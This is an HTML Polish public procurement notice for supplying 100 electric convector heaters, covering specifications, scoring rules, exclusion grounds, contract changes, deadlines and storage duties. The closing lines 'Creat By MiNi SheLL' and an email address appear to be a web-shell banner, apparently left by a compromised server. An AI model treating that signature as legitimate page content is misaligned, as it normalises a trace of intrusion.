<h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II<br/>Przedmiotem zamówienia dla części II jest dostawa 100 szt. grzejników elektrycznych, których minimalne parametry techniczne zostały wskazane poniżej. <br/><br/>1) Grzejniki elektryczne – 100 szt.<br/><br/>1.	Wymagania ogólne<br/>•	elektryczny grzejnik konwektorowy o mocy min. 2000W<br/>•	blokada ustawień termostatu, np. przed dziećmi,<br/>•	niskotemperaturowy element grzewczy z dyfuzorem aluminiowym,<br/>•	elektroniczny termostat temperatury z mikroprocesorem i z płynną regulacją temperatury w zakresie co najmniej od 7 do 30°C, <br/>•	3 zakresy temperatur pracy: KOMFORT, ANTYZAMARZANIE 7°C, EKO (temperatura KOMFORT pomniejszona o 3,5°C),<br/>•	wymiary: 76,1x46,1x9,2cm (szerokość x wysokość x głębokość), z tolerancją +/- 15%,<br/>•	przewód elektryczny zakończony wtyczką typu Euro,<br/>•	kolor biały (RAL9016, lakier epoxy-polyester),<br/>•	zasilanie ~230 V/50 Hz,<br/>•	komplet nóżek w opakowaniu,<br/>•	możliwość manualnej nastawy temperatury przy pomocy pokrętła termostatu lub za pomocą elektronicznego panelu sterowania. <br/><br/>UWAGA! Wykonawca, który będzie realizował zamówienie, musi posiadać stosowne doświadczenie, które potwierdzi zdolności do należytego wykonania umowy, wskazujące, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej jedno zadanie/dostawę odpowiadające swoim rodzajem przedmiotowi zamówienia tj. dostawa grzejników elektrycznych o wartości minimum 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych brutto).<br/>Zamawiający zastrzega sobie prawo do zweryfikowania posiadanego doświadczenia przed podpisaniem umowy z Wykonawcą, którego oferta uznana zostanie za najkorzystniejszą. Wówczas, Wykonawca na wezwanie Zamawiającego, musi obligatoryjnie przedłożyć dokumenty, które potwierdzą posiadanie wskazanego doświadczenia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 39000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39715200-9 - Urządzenia grzewcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) K1: Cena – 60 %. <br/>2) K2: Termin dostawy zamówienia – 40 % <br/><br/>Ad 1) Kryterium: Cena - znaczenie w ocenie 60%<br/>Punkty zostaną przyznane wg wzoru: <br/><br/>Najniższa cena spośród ofert niepodlegających odrzuceniu/Cena badanej oferty brutto X 60 % x 100 = …… pkt<br/><br/>Maksymalna ilość punktów w ramach tego kryterium: 60 punktów<br/><br/>Ad 2) Kryterium: Termin dostawy zamówienia – znaczenie w ocenie 40%. <br/>Punkty za kryterium „Termin dostawy zamówienia” zostaną przyznane w skali punktowej do 40 pkt, na podstawie deklaracji wykonawcy złożonej w formularzu ofertowym.<br/>Ilość punktów zostanie przyznana następująco:<br/>- 0 punktów za zadeklarowanie dostawy zamówienia do 15 dni kalendarzowych,<br/>- 20 punktów za zadeklarowanie dostawy zamówienia do 10 dni kalendarzowych, <br/>- 40 punktów za zadeklarowanie dostawy zamówienia do 5 dni kalendarzowych<br/><br/>Zadeklarowany termin będzie liczony od dnia podpisania umowy.<br/><br/>Deklarowana termin dostawy zamówienia, dotyczy wszystkich elementów, na które składa się zamówienie. Punkty w kryterium „Termin dostawy zamówienia” zostaną przyznane tylko w przypadku złożenia przez Wykonawcę oświadczenia, na podstawie którego będzie można przyznać punkty w tym kryterium. W przypadku nie złożenia oświadczenia lub zaznaczenia więcej niż jednego wariantu, oferta otrzyma w tym kryterium 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas (termin) dostawy zamówienia. Nie będzie to jednak podstawą do odrzucenia oferty. <br/><br/>2. Za najkorzystniejszą uznana zostanie ta oferta, która uzyska najwyższą liczbę punktów (K1+K2). Liczba uzyskanych punktów będzie zaokrąglana do dwóch miejsc po przecinku. Ocenie będą podlegały oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, każdy wykonawca składający ofertę, zobowiązany jest złożyć wraz z ofertą stosowne oświadczenie, stanowiące załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie określa warunków udziału w postępowaniu.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3)	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian umowy w zakresie dotyczącym:<br/>a)	zmiana wynagrodzenia jedynie w zakresie zmiany urzędowej stawki podatku VAT. <br/>W przypadku ustawowej zmiany stawki podatku VAT, odpowiedniej zmianie ulegnie wynagrodzenie brutto;<br/>b)	zmiany terminu realizacji: Termin realizacji przedmiotu umowy może ulec zmianie, w przypadku:<br/>- decyzji administracyjnych (decyzje władz publicznych, zmiany obowiązującego prawa, oczekiwanie na nieprzewidziane wcześniej a konieczne wyniki ekspertyz, wyroki sądowe itp.);<br/>- zaistnienia zdarzenia nieprzewidzianego lub zdarzeń losowych uniemożliwiających realizacje przedmiotu zamówienia w terminach wymienionych w SWZ;<br/>- zaistnienia siły wyższej w rozumieniu kodeksu cywilnego (klęska żywiołowa, niepokoje społeczne, działania militarne itp.);<br/>- zmiany terminu płatności: w przypadku ograniczenia finansowego po stronie Zamawiającego, z przyczyn od niego niezależnych.<br/>2.	Wystąpienie którejkolwiek z wymienionych w ust. 2 okoliczności nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania.<br/>3.	Warunkiem dokonania zmian umowy jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę i jego akceptacja przez drugą stronę lub sporządzenie przez strony stosownego protokołu.<br/>4.	Zmiany treści umowy wymagają formy pisemnej pod rygorem nieważności.<br/>5.	Zmiana terminu, określona w ust.1 pkt b) może zostać dokonana z zastrzeżeniem, że w razie braku zgody IŻ na przedłużenie projektu, realizacja umowy nie może przekroczyć daty 31.12.2023r. W przypadku braku wykonania umowy w tym terminie, przy jednoczesnym braku zgody na przedłużenie projektu, Zamawiający będzie uprawniony do odstąpienia od umowy, na zasadach określonych w § 8 ust. 5 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod adresem https://platformazakupowa.pl/transakcja/842826. W celu złożenia oferty należy przejść do transakcji (zakładki) dedykowanej dla niniejszego postępowania z sygnaturą sprawy: BS.2611.54.2023 i daną nazwą postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-16 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA! DOTYCZY OBYDWU CZĘŚCI ZAMÓWIENIA!!! W związku z faktem, iż Zamawiający nie dysponuje odpowiednią przestrzenią do przechowywania przedmiotu zamówienia, Wykonawca zobowiązany jest do zapewniania powierzchni magazynowej minimum klasy A, w której składowany będzie przedmiot zamówienia przez okres od dnia dostawy (zgodnie z deklaracją zawartą w formularzu ofertowym) do maksymalnie 31 grudnia 2023 r. Lokalizacja, w której będzie przechowywany przedmiot zamówienia musi znajdować się w granicach administracyjnych województwa podkarpackiego (Polska). Zamawiający dopuszcza przechowywanie przedmiotu zamówienia w magazynie klasy B+ lub B, o ile jest on własnością Wykonawcy i znajduje się w granicach administracyjnych województwa podkarpackiego.<br/>Wykonawca zobligowany jest dostarczyć przedmiot zamówienia w terminie zadeklarowanym w formularzu ofertowym do miejsca magazynowania. Z tego miejsca, Zamawiający, będzie sukcesywnie odbierał przedmiot zamówienia, w czasie - od dnia dostawy do maksymalnie 31 grudnia 2023 r. - w partiach, w zależności od możliwości transportowych Zamawiającego. Zamawiający każdorazowo poinformuje Wykonawcę, o dokładnej dacie odbioru oraz liczbie sztuk danego asortymentu, który będzie odbierał, na minimalnie 3 dni przed planowaną datą odbioru. Wykonawca zobowiązany jest udostępnić możliwość odbioru przedmiotu zamówienia ze wskazanego magazynu w godz. 8.00-18.00 w dni robocze (od poniedziałku do piątku), jednocześnie być obecny na miejscu podczas wydawania danej liczby sztuk asortymentu lub delegować/upełnomocnić do tych czynności inną osobę. Koszty ochrony magazynu i przedmiotu zamówienia, najmu/udostępnienia powierzchni magazynowej, a także koszty ubezpieczenia powierzchni magazynowej, spoczywają na Wykonawcy i jest on zobligowany wliczyć to w cenę, za pełną realizację zamówienia.<br/>Termin dostawy, stanowiący jedno z kryteriów oceny ofert, to czas w jakim Wykonawca dostarczy CAŁY (WSZYSTKIE ELEMENTY DANEJ CZĘŚCI ZAMÓWIENIA) asortyment, objęty daną częścią zamówienia, do miejsca magazynowania, zgodnie z powyższym. Prawidłowość terminu dostawy zostanie potwierdzona obustronnym protokołem zdawczo-odbiorczym. <br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy będzie zobligowany wskazać dokładny adres (nazwa magazynu i numer, ulica, kod pocztowy, miejscowość), gdzie znajduje się magazyn, w którym przechowywany będzie przedmiot zamówienia. <br/><br/>Podpisanie umowy nastąpi w miejscu i terminie wskazanym przez Zamawiającego. Umowa będzie podpisywana w siedzibie zamawiającego (35-959 Rzeszów, ul. Szopena 51) po wcześniejszym ustaleniu dokładnego terminu. Dotyczy to też wykonawców, którzy mają siedzibę poza Rzeszowem. Zamawiający wyznaczy dwa proponowane terminy na podpisanie umowy. W przypadku, gdy Wykonawca nie stawi się w żadnym z zaproponowanych terminów, wówczas Zamawiający uzna, że uchyla się on od podpisania umowy i przystąpi do ponownego wyboru najkorzystniejszej oferty. Zamawiający dopuszcza możliwość elektronicznego podpisu umowy. <br/><br/>UWAGA! W Formularzu Ofertowym stanowiącym załącznik nr 3 do SWZ, każdy Wykonawca zobligowany jest podać stosowne rozbicie cenowe za jednostkowe ceny sprzętu. W ramach części I Wykonawca zobligowany jest podać ceny za jedną sztukę każdego z trzech rodzajów agregatów, a następnie iloczyn tej ceny oraz maksymalnej wartości zamawianego sprzętu. W ramach części II Wykonawca zobligowany jest podać ceny za jedną sztukę grzejnika elektrycznego a następnie iloczyn tej ceny oraz maksymalnej wartości zamawianego sprzętu.<br/>Pamiętać należy, że w procesie badania i oceny ofert, ocenie podlegać będzie wyłącznie cena za pełną realizację zamówienia. Rozbicie cenowe potrzebne jest do rozliczenia finansowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com